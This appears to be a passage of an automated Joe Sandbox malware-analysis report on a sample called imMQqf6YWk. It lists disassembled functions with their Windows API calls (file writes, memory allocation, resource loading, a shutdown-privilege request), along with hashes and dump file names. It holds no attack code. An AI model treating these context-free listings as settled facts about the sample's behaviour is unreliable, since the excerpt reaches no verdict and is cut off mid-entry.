                                                                              • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                              • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                              • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                              • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                              • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021403AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                              • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                              • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                              • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                              • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                              • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                              • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                                              • String ID:
                                                                              • API String ID: 1658689577-0
                                                                              • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                              • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                              • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                              • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                              • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                              • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                              • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                              • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                              • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                              • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                              • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                              • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                              • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021403AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastWrite
                                                                              • String ID:
                                                                              • API String ID: 442123175-0
                                                                              • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                              • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                              • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                              • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                              APIs
                                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage
                                                                              • String ID:
                                                                              • API String ID: 1306739567-0
                                                                              • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                              • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                              • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                              • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                              APIs
                                                                              • SetEndOfFile.KERNEL32(?,02158000,0040A08C,00000000), ref: 004076B3
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021403AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 734332943-0
                                                                              • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                              • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                              • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                              • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                              • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                              • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                              • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                              • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                              • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                              • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                              APIs
                                                                              • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrev
                                                                              • String ID:
                                                                              • API String ID: 122130370-0
                                                                              • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                              • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                              • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                              • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                              • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                              • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                              • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                              • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                              • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                              • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                              • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                              • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                              • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                              • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                              • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 107509674-3733053543
                                                                              • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                              • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                              • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                              • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                              • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                              • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                              • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                              • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                              • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                              • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                              • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                              APIs
                                                                              • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.3873775237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873818456.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.3873834258.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: SystemTime
                                                                              • String ID:
                                                                              • API String ID: 2656138-0
                                                                              • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                              • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                              • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                              • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,00409C6A), ref: 00405D02
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.3873795493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
